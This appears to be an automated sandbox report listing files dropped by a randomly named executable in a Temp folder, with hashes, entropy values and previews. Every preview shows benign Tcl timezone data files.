                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7189
                                                                                                                                                                                                                                                    Entropy (8bit):3.6040923024580884
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WB8kMKVCy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lf:AroXPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:9AE4C7EC014649393D354B02DF00F8B9
                                                                                                                                                                                                                                                    SHA1:D82195DEF49CFFEAB3791EA70E6D1BB8BC113155
                                                                                                                                                                                                                                                    SHA-256:4CB6582052BE7784DD08CE7FD97ACC56234F07BCF80B69E57111A8F88454908E
                                                                                                                                                                                                                                                    SHA-512:6F0C138AF98A4D4A1028487C29267088BD4C0EC9E7C1DB9818FA31A61C9584B67B3F5909C6E6FDB0F7183629E892A77BA97654D39FCE7DDEF6908F8146B7BE72
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:EET) {. {-9223372036854775808 7200 0 EET}. {228877200 10800 1 EEST}. {243997200 7200 0 EET}. {260326800 10800 1 EEST}. {276051600 7200 0 EET}. {291776400 10800 1 EEST}. {307501200 7200 0 EET}. {323830800 10800 1 EEST}. {338950800 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):106
                                                                                                                                                                                                                                                    Entropy (8bit):4.879680803636454
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yLWkXGm2OHLVvain:SlSWB9X5y2m2OHLViin
                                                                                                                                                                                                                                                    MD5:33221E0807873CC5E16A55BF4450B6D4
                                                                                                                                                                                                                                                    SHA1:A01FD9D1B8E554EE7A25473C2FBECA3B08B7FD02
                                                                                                                                                                                                                                                    SHA-256:5AA7D9865554BCE546F1846935C5F68C9CA806B29B6A45765BA55E09B14363E4
                                                                                                                                                                                                                                                    SHA-512:54A33B239BBFCFC645409FBC8D9DDBFCAE56067FA0427D0BE5F49CB32EB8EEC8E43FC22CE1C083FDC17DD8591BE9DB28A2D5006AFA473F10FB17EF2CE7AED305
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:EST) {. {-9223372036854775808 -18000 0 EST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8227
                                                                                                                                                                                                                                                    Entropy (8bit):3.723178863172678
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:W4UwdaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:Cwdrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:1A7BDED5B0BADD36F76E1971562B3D3B
                                                                                                                                                                                                                                                    SHA1:CF5BB82484C4522B178E25D14A42B3DBE02D987D
                                                                                                                                                                                                                                                    SHA-256:AFD2F12E50370610EA61BA9DD3838129785DFDEE1EBCC4E37621B54A4CF2AE3F
                                                                                                                                                                                                                                                    SHA-512:4803A906E2C18A2792BF812B8D26C936C71D8A9DD9E87F7DA06630978FCB5DE1094CD20458D37973AA9967D51B97F94A5785B7B15F807E526C13D018688F16D9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:EST5EDT) {. {-9223372036854775808 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {162370800 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -180
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                    Entropy (8bit):4.812476042768195
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsPHVyVAIgNGE7JW6yCh0DcPHv:SlSWB9IZaM3y7AVAIgNTFW6yg0DY
                                                                                                                                                                                                                                                    MD5:3708D7ED7044DE74B8BE5EBD7314371B
                                                                                                                                                                                                                                                    SHA1:5DDC75C6204D1A2A59C8441A8CAF609404472895
                                                                                                                                                                                                                                                    SHA-256:07F4B09FA0A1D0BA63E17AD682CAD9535592B372815AB8FD4884ACD92EC3D434
                                                                                                                                                                                                                                                    SHA-512:A8761601CD9B601E0CE8AC35B6C7F02A56B07DC8DE31DEB99F60CB3013DEAD900C74702031B5F5F9C2738BA48A8420603D46C3AE0E0C87D40B9D9D44CE0EAE81
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Cairo)]} {. LoadTimeZoneFile Africa/Cairo.}.set TZData(:Egypt) $TZData(:Africa/Cairo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):167
                                                                                                                                                                                                                                                    Entropy (8bit):4.85316662399069
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV5QH+owFVAIgoq6QH7W6yMQs/h8QanQHpn:SlSWB9IZaM3ymnQeowFVAIgonQbNyM/R
                                                                                                                                                                                                                                                    MD5:AA0DEB998177EB5208C4D207D46ECCE3
                                                                                                                                                                                                                                                    SHA1:DD8C7CE874EE12DD77F467B74A9C8FC74C7045FF
                                                                                                                                                                                                                                                    SHA-256:16A42F07DE5233599866ECC1CBB1FC4CD4483AC64E286387A0EED1AFF919717D
                                                                                                                                                                                                                                                    SHA-512:D93A66A62304D1732412CAAAB2F86CE5BCD07D07C1315714D81754827D5EFD30E36D06C0DC3CF4A8C86B750D7D6A144D609D05E241FADC7FF78D3DD2044E4CBB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Dublin)]} {. LoadTimeZoneFile Europe/Dublin.}.set TZData(:Eire) $TZData(:Europe/Dublin).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):105
                                                                                                                                                                                                                                                    Entropy (8bit):4.883978227144926
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yRDMWkXGm2OHvDd:SlSWB9X5yRQCm2OHB
                                                                                                                                                                                                                                                    MD5:94CDB0947C94E40D59CB9E56DB1FA435
                                                                                                                                                                                                                                                    SHA1:B73907DAC08787D3859093E8F09828229EBAA6FD
                                                                                                                                                                                                                                                    SHA-256:17AF31BD69C0048A0787BA588AD8641F1DC000A8C7AEC66386B0D9F80417ABBF
                                                                                                                                                                                                                                                    SHA-512:5F47A2864F9036F3FD61FC65ED4969330DD2A1AC237CB2BD8E972DDFED75120D8D377D5C84060015DCFC163D03F384DC56DC8C6F29E65528C04F1FDA8BBC688E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT) {. {-9223372036854775808 0 0 GMT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):4.862090278972909
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRDOm7/8RDMvn:SlSWB9IZaM3yF4FVAIgJtyRSw8RQvn
                                                                                                                                                                                                                                                    MD5:4AC2027A430A7343B74393C7FE1D6285
                                                                                                                                                                                                                                                    SHA1:C675A91954EC82EB67E1B7FA4B0C0ED11AAF83DA
                                                                                                                                                                                                                                                    SHA-256:01EEF5F81290DBA38366D8BEADAD156AAC40D049DBFA5B4D0E6A6A8641D798D1
                                                                                                                                                                                                                                                    SHA-512:61943A348C4D133B0730EAA264A15EF37E0BBE2F767D87574801EAAA9A457DA48D854308B6ABADA21D33F4D498EB748BCB66964EB14BB8DC1367F77A803BA520
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT+0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.981349705962426
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yRDOvedSXGm2OH1VnYAv:SlSWB9X5yRSvwJm2OH1VnYK
                                                                                                                                                                                                                                                    MD5:ED439FA2D62624D9616CF1F87C850EA1
                                                                                                                                                                                                                                                    SHA1:D0CF000B89433BF245BD58EB644067B37E108B42
                                                                                                                                                                                                                                                    SHA-256:5E32300CC20CB5CE61BBEFA37D547F765F8B22D9085AD24FC2BA6358233BD0ED
                                                                                                                                                                                                                                                    SHA-512:45D6B20C12FE921A2ACA7EB07792C2F7F4EC77279CF76AA8623F8DC23A306699DAB4920233D8597F7DF5661120F3AC555DBC6C5E72291C5277D102317BC7E008
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+1) {. {-9223372036854775808 -3600 0 GMT+1}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):116
                                                                                                                                                                                                                                                    Entropy (8bit):4.95989422353511
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yRDOgFkXGm2OH1VyMVCC:SlSWB9X5yRS0m2OH1VyMh
                                                                                                                                                                                                                                                    MD5:AA3C84567F89D180FA967A8E01ED8DB3
                                                                                                                                                                                                                                                    SHA1:1B076494BFAAB46178EFC9602B4CF5E2A62BB6B1
                                                                                                                                                                                                                                                    SHA-256:E6DA2EFC31F04D6C9DFC594D99B4499320D674B00F2A17401792CF663810BFB4
                                                                                                                                                                                                                                                    SHA-512:0F101632AF981E53C0063B59A580034DE789DB4205EDCF7228CF510470AFDF9BFBE17B03C6A4EFA8E5C180F7869F3DE0AE97514D026772734624185B6E826D43
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+10) {. {-9223372036854775808 -36000 0 GMT+10}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):116
                                                                                                                                                                                                                                                    Entropy (8bit):4.9977421504796204
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yRDOeLXGm2OHaFUYK:SlSWB9X5yRShm2OHaFUL
                                                                                                                                                                                                                                                    MD5:F57A7F84AA6542BBBD7212461380D463
                                                                                                                                                                                                                                                    SHA1:FD192ADF297C09F38312D668E2E2AB569F72544E
                                                                                                                                                                                                                                                    SHA-256:008A6C934B494644990D6A01BA112AFF7C957112EA21276F959B28E3128CB7A6
                                                                                                                                                                                                                                                    SHA-512:ADBC6F509C9745FFC511662D403FC0FABF87C01E2D0F03741D2B10CA1C434890F16F028B9D2D8A7397F156B0EC69438DD4C1A24F675BC113523D9D6DC444646A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+11) {. {-9223372036854775808 -39600 0 GMT+11}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):116
                                                                                                                                                                                                                                                    Entropy (8bit):4.973993120288556
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx5yRDOK/kXGm2OH3FNYMXL:SlSWB9X5yRSKTm2OH3XYM7
                                                                                                                                                                                                                                                    MD5:F2E06CB22EECFCFBF8E6A896CB93D70D
                                                                                                                                                                                                                                                    SHA1:0D6759F9538F9CC7EC4799E80047279C5765FE8F
                                                                                                                                                                                                                                                    SHA-256:3298FBCA6673EA9068CBE030FC6CE663615482C2691BC3FEF0D0C6DCD080749C
                                                                                                                                                                                                                                                    SHA-512:7DEDC53220D6415AE0FE3422C8F2B40F808F8B1BF95DDE24849C1E9834ACD937FA4C702AD20F6D2BCD100CB4450B86FA7A2625F3A55A1B1A8CC4F39383212629
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+12) {. {-9223372036854775808 -43200 0 GMT+12}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.921571940456554
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+2) {. {-9223372036854775808 -7200 0 GMT+2}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.9509374397671495
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+3) {. {-9223372036854775808 -10800 0 GMT+3}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.971905505780861
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+4) {. {-9223372036854775808 -14400 0 GMT+4}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.958435272857266
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+5) {. {-9223372036854775808 -18000 0 GMT+5}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.975103119610687
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+6) {. {-9223372036854775808 -21600 0 GMT+6}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.929319953392498
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+7) {. {-9223372036854775808 -25200 0 GMT+7}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.914606655117358
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+8) {. {-9223372036854775808 -28800 0 GMT+8}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):114
                                                                                                                                                                                                                                                    Entropy (8bit):4.957559259961566
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+9) {. {-9223372036854775808 -32400 0 GMT+9}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):4.849103265985896
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT-0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):112
                                                                                                                                                                                                                                                    Entropy (8bit):4.940990471370115
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-1) {. {-9223372036854775808 3600 0 GMT-1}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115
                                                                                                                                                                                                                                                    Entropy (8bit):4.920071111791664
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-10) {. {-9223372036854775808 36000 0 GMT-10}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115
                                                                                                                                                                                                                                                    Entropy (8bit):4.958248151144388
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-11) {. {-9223372036854775808 39600 0 GMT-11}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115
                                                                                                                                                                                                                                                    Entropy (8bit):4.934292607647314
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-12) {. {-9223372036854775808 43200 0 GMT-12}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115
                                                                                                                                                                                                                                                    Entropy (8bit):4.95081551660288
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-13) {. {-9223372036854775808 46800 0 GMT-13}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):115
                                                                                                                                                                                                                                                    Entropy (8bit):4.945988068238153
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-14) {. {-9223372036854775808 50400 0 GMT-14}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):112
                                                                                                                                                                                                                                                    Entropy (8bit):4.8806789758150835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-2) {. {-9223372036854775808 7200 0 GMT-2}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.910553245785435
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-3) {. {-9223372036854775808 10800 0 GMT-3}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.931706869905462
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-4) {. {-9223372036854775808 14400 0 GMT-4}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.918117431380773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-5) {. {-9223372036854775808 18000 0 GMT-5}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                    Entropy (8bit):4.934932781202809
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-6) {. {-9223372036854775808 21600 0 GMT-6}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):113
